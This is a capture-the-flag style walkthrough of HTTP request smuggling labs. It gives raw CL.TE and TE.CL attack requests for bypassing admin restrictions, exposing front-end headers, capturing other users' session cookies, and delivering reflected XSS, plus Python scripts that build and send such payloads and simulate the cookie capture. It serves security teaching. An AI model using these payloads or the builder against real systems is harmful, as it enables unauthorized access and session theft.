For an introduction to request smuggling, see
Common attacks that make use of request smuggling include:
- Bypassing front-end access-control restrictions
- Revealing sensitive information that the front end adds to requests
- Capturing other users' requests
- Delivering reflected XSS
Bypassing front-end access-control restrictions
A normal request to /admin returns "Path /admin is blocked".
The target has a CL.TE vulnerability, however, so the following request can be used instead. Content-Length must cover the whole body including the smuggled GET, and the request is sent twice: the first response belongs to the POST itself, and the response to the smuggled GET /admin arrives on the second request.
############# request twice #############
POST / HTTP/1.1
Host: ac631fc51f38e05280923fa5000e0064.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
############# second response #############
...omit...
Admin interface only available if logged in as an administrator, or if requested as localhost
...omit...
The admin page was reached, but it is only available to localhost, so the attack request is modified as follows:
############# request twice #############
POST / HTTP/1.1
Host: ac631fc51f38e05280923fa5000e0064.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: localhost
############# second response #############
the admin interface is returned
Lab: Exploiting HTTP request smuggling to bypass front-end security controls, CL.TE vulnerability
For a different case: if the target has a TE.CL vulnerability instead, use the following request. The chunk-size line (87) must be the hexadecimal length of the chunk that carries the smuggled request, and Content-length: 4 covers only that chunk-size line, so the back end treats everything after it as the next request. When sending this from Burp Repeater, turn off the automatic Content-Length update so the value is not rewritten.
############# request twice #############
POST / HTTP/1.1
Host: acd01ff61f66e0678013454c001d00b6.web-security-academy.net
Content-length: 4
Transfer-Encoding: chunked

87
GET /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

############# second response #############
the admin interface is returned
Lab: Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability
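The length fields in the requests above are counted by hand, which is where most smuggling attempts go wrong. The Python helper below is an added example, not code from this write-up or from PortSwigger: it builds CL.TE and TE.CL payloads with Content-Length and the chunk size computed from the bytes actually sent. The host lab.example, the send_raw helper, and the inner_request wrapper are assumptions made for illustration; the smuggled request's own Content-Length is deliberately settable above its real body length, because several of the attacks on this page rely on the back end waiting for the next user's bytes to complete it.

```python
"""
Added example, not code from the original write-up or from PortSwigger: build
CL.TE and TE.CL smuggling requests with every length field computed instead of
hand-counted. lab.example is a placeholder host, not a lab host from the page.
"""
import socket
import ssl

CRLF = b"\r\n"


def inner_request(method, path, headers, body=b"", content_length=None):
    """Build the request that will be smuggled. Pass content_length larger
    than len(body) on purpose when the attack needs the back end to keep the
    request open and complete it with the next user's bytes."""
    if content_length is None:
        content_length = len(body)
    lines = [f"{method} {path} HTTP/1.1".encode()]
    lines += [f"{name}: {value}".encode() for name, value in headers]
    lines.append(f"Content-Length: {content_length}".encode())
    return CRLF.join(lines) + CRLF + CRLF + body


def build_clte(host, smuggled, path="/"):
    """CL.TE: the front end trusts Content-Length and forwards the whole body;
    the back end trusts Transfer-Encoding, stops after the 0 chunk and keeps
    `smuggled` on the connection as the start of the next request."""
    body = b"0" + CRLF + CRLF + smuggled
    headers = [
        f"POST {path} HTTP/1.1".encode(),
        f"Host: {host}".encode(),
        b"Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {len(body)}".encode(),  # covers the smuggled bytes
        b"Transfer-Encoding: chunked",
    ]
    return CRLF.join(headers) + CRLF + CRLF + body


def build_tecl(host, smuggled, path="/"):
    """TE.CL: the front end trusts Transfer-Encoding, so `smuggled` must be an
    exactly-sized chunk; the back end trusts Content-Length, which is set to
    cover only the chunk-size line, so the chunk data becomes the next request."""
    size_line = f"{len(smuggled):x}".encode() + CRLF
    body = size_line + smuggled + CRLF + b"0" + CRLF + CRLF
    headers = [
        f"POST {path} HTTP/1.1".encode(),
        f"Host: {host}".encode(),
        b"Content-Type: application/x-www-form-urlencoded",
        f"Content-length: {len(size_line)}".encode(),  # 4 for a 2-digit hex size
        b"Transfer-Encoding: chunked",
    ]
    return CRLF.join(headers) + CRLF + CRLF + body


def send_raw(host, data, port=443, timeout=10):
    """Send raw bytes over TLS and return whatever the server answers. Send the
    payload twice: the first response belongs to the POST, the smuggled
    request's response rides on the next request over the same back-end socket."""
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=timeout) as raw:
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            tls.sendall(data)
            chunks = []
            try:
                while True:
                    part = tls.recv(65536)
                    if not part:
                        break
                    chunks.append(part)
            except socket.timeout:
                pass
            return b"".join(chunks)


if __name__ == "__main__":
    admin = inner_request("GET", "/admin",
                          [("Host", "localhost"),
                           ("Content-Type", "application/x-www-form-urlencoded")],
                          b"x=1", content_length=15)
    print(build_clte("lab.example", admin).decode())
    print(build_tecl("lab.example", admin).decode())
```

Note that build_tecl sets Content-length to the length of the chunk-size line rather than a fixed 4: once the smuggled request exceeds 255 bytes the hex size has three digits and the back end must read 5 bytes, a detail that is easy to miss when editing payloads by hand.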
Revealing sensitive information that the front end adds to requests
In many applications the front-end server rewrites each request before forwarding it to the back end, usually by adding extra request headers.
In the attack below, the smuggled POST declares a Content-Length larger than its own body, so the back end appends the next request (already rewritten by the front end) to the search parameter, and the search results echo it back. The echoed request reveals the header X-WwcdiB-Ip: 122.55.108.34 that the front end added.
############# request twice #############
POST / HTTP/1.1
Host: ac471f931ebc52d180f32c9e00b300a9.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 124
Transfer-Encoding: chunked

0

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
Connection: close

search=test
############# second response #############
...omit...
<h1>0 search results for 'testPOST / HTTP/1.1
X-WwcdiB-Ip: 122.55.108.34
Host: ac471f931ebc52d180f32c9e00b300a9.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 124
Transfer-'</h1>
...omit...
Since the admin page only allows access from 127.0.0.1, the attack request is changed to carry X-WwcdiB-Ip: 127.0.0.1, the header the front end uses to pass the client address to the back end:
############# request twice #############
POST / HTTP/1.1
Host: ac471f931ebc52d180f32c9e00b300a9.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 143
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
X-WwcdiB-Ip: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
Connection: close

x=1
############# second response #############
the admin interface is returned
Lab: Exploiting HTTP request smuggling to reveal front-end request rewriting
Capturing other users' requests
Suppose a normal comment-posting request looks like this:
POST /post/comment HTTP/1.1
...omit...
Cookie: session=9iqFDvrsD4YjgDoaR2TicREMpjQYUbNp

csrf=668TCjg6wdAu0ydXM6EAPMWgwX43Q2GA&postId=4&comment=test&name=t&email=t%40gmal.com&website=
If the target has a CL.TE vulnerability, send the following request:
POST / HTTP/1.1
Host: ac8c1f511e1b975f80e47d1000550026.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 277
Transfer-Encoding: chunked

0

POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 805
Cookie: session=9iqFDvrsD4YjgDoaR2TicREMpjQYUbNp

csrf=668TCjg6wdAu0ydXM6EAPMWgwX43Q2GA&postId=4&name=Carlos+Montoya&email=carlos%40normal-user.net&website=&comment=tttt
If another user then sends a request to the site, such as the one below, it is joined onto the smuggled request:
GET /post?postId=4
...omit...
Cookie: session=9iqFDvrsD4YjgDoaR2TicREMpjQYUbNp
The merged request is shown below. When it is processed, the comment parameter carries the other user's request, including their cookie:
POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 805
Cookie: session=9iqFDvrsD4YjgDoaR2TicREMpjQYUbNp

csrf=668TCjg6wdAu0ydXM6EAPMWgwX43Q2GA&postId=4&name=Carlos+Montoya&email=carlos%40normal-user.net&website=&comment=ttttGET /post?postId=4
...omit...
Cookie: session=9iqFDvrsD4YjgDoaR2TicREMpjQYUbNp
The other user's request is then posted to the site as the comment, which ends up roughly as follows, and their cookie has been captured:
ttttGET /post?postId=4
...omit...
Cookie: session=9iqFDvrsD4YjgDoaR2TicREMpjQYUbNp
If only part of the content is posted, as below, the smuggled request's Content-Length is too small; increase it so that more of the victim's request is swallowed. It must not exceed the bytes the victim's request actually supplies, though, or the back end keeps waiting for the remainder and the request times out.
ttttGET /pos
Lab: Exploiting HTTP request smuggling to capture other users’ requests
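To see why the comment ends up holding the victim's request, and why a too-small Content-Length yields only a prefix such as ttttGET /pos, here is an added simulation (not code from this write-up) of a front end that splits by Content-Length feeding a back end that splits by Transfer-Encoding over one shared connection. The same model explains the front-end rewriting disclosure in the previous section: whatever bytes the back end attaches to the smuggled body are reflected wherever the application echoes that body. The host lab.example, the csrf token and both session values are constructed placeholders, as is the victim request.

```python
"""
Added example, not code from the original write-up: a model of the CL.TE
desync behind the capture attack. The front end splits requests by
Content-Length, forwards them over one back-end connection, and the back end
re-splits by Transfer-Encoding. Host, csrf token and session values are
made-up placeholders.
"""
from urllib.parse import parse_qs

CRLF = b"\r\n"


def _headers(head: bytes) -> dict:
    """Lower-cased header map from a raw request head (request line excluded)."""
    out = {}
    for line in head.split(CRLF)[1:]:
        name, _, value = line.partition(b":")
        out[name.strip().lower().decode()] = value.strip().decode()
    return out


def _read_chunked(data: bytes):
    """Consume a chunked body. Returns (body, remainder), or (None, data)
    when the terminating 0 chunk has not arrived yet."""
    body, rest = b"", data
    while True:
        line, sep, rest = rest.partition(CRLF)
        if not sep:
            return None, data
        size = int(line.split(b";")[0].strip() or b"0", 16)
        if size == 0:
            if not rest.startswith(CRLF):       # no trailers in this model
                return None, data
            return body, rest[2:]
        if len(rest) < size + 2:
            return None, data
        body += rest[:size]
        rest = rest[size + 2:]


def parse_requests(stream: bytes, prefer: str):
    """Split `stream` into (head, body) pairs the way a server that prefers
    `prefer` ('cl' or 'te') when both length headers are present would.
    Returns the complete requests and the bytes still waiting for more input."""
    out = []
    while True:
        head, sep, rest = stream.partition(CRLF + CRLF)
        if not sep or not head:
            return out, stream
        h = _headers(head)
        has_te = "chunked" in h.get("transfer-encoding", "")
        has_cl = "content-length" in h
        if has_te and (prefer == "te" or not has_cl):
            body, remainder = _read_chunked(rest)
            if body is None:
                return out, stream
        else:
            cl = int(h.get("content-length", "0"))
            if len(rest) < cl:                  # server keeps waiting
                return out, stream
            body, remainder = rest[:cl], rest[cl:]
        out.append((head, body))
        stream = remainder


def simulate(attacker: bytes, victim: bytes, front="cl", back="te"):
    """Run both requests through a front end preferring `front` and a back end
    preferring `back`, sharing one back-end connection."""
    fe_reqs, _ = parse_requests(attacker + victim, front)
    forwarded = b"".join(head + CRLF + CRLF + body for head, body in fe_reqs)
    return parse_requests(forwarded, back)


# Constructed victim request; the cookie is what the attacker wants to capture.
VICTIM = (b"GET /post?postId=4 HTTP/1.1" + CRLF + b"Host: lab.example" + CRLF +
          b"Cookie: session=VICTIMSESSION" + CRLF + CRLF)


def capture_attack(capture_bytes: int, victim: bytes = VICTIM):
    """Smuggle a POST /post/comment whose Content-Length overshoots its own form
    body by `capture_bytes`, so the back end completes it from the victim's
    request. Returns the stored comment text, or None when the overshoot exceeds
    what the victim supplies (the back end would wait and time out)."""
    form = (b"csrf=TOKEN&postId=4&name=Carlos+Montoya"
            b"&email=carlos%40normal-user.net&website=&comment=tttt")
    smuggled = (b"POST /post/comment HTTP/1.1" + CRLF +
                b"Content-Type: application/x-www-form-urlencoded" + CRLF +
                f"Content-Length: {len(form) + capture_bytes}".encode() + CRLF +
                b"Cookie: session=ATTACKER" + CRLF + CRLF + form)
    body = b"0" + CRLF + CRLF + smuggled
    attacker = (b"POST / HTTP/1.1" + CRLF + b"Host: lab.example" + CRLF +
                f"Content-Length: {len(body)}".encode() + CRLF +
                b"Transfer-Encoding: chunked" + CRLF + CRLF + body)
    be_reqs, _ = simulate(attacker, victim)
    if len(be_reqs) < 2:
        return None
    head, comment_body = be_reqs[1]
    assert head.startswith(b"POST /post/comment")
    return parse_qs(comment_body.decode())["comment"][0]


if __name__ == "__main__":
    print(repr(capture_attack(8)))            # only a prefix: 'ttttGET /pos'
    print(repr(capture_attack(len(VICTIM))))  # whole request, cookie included
```

The comment parameter absorbs the victim's request because comment is the last field in the form body: the application's form parser takes everything after the last "=" as that field's value, CRLFs and Cookie header included, which is why the attacker reorders the fields to put comment last.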
Reflected XSS
Suppose that when a post is viewed, the response reflects the request's User-Agent, as below:
############# request #############
GET /post?postId=5 HTTP/1.1
...omit...
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
...omit...
############# response #############
...omit...
<input required type="hidden" name="userAgent" value="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36">
...omit...
If the target has a CL.TE vulnerability, prepare the following smuggled request with an XSS payload in the User-Agent header:
############# request twice #############
POST / HTTP/1.1
Host: acab1fb71ede4624806f0baf0038009a.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 150
Transfer-Encoding: chunked

0

GET /post?postId=5 HTTP/1.1
User-Agent: a"/><script>alert(1)</script>
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

x=1
When another user sends a request to the site, it is merged with the smuggled request, and the response they receive reflects the XSS payload from the User-Agent:
...omit...
<input required type="hidden" name="userAgent" value="a"/><script>alert(1)</script>">
...omit...
Lab: Exploiting HTTP request smuggling to deliver reflected XSS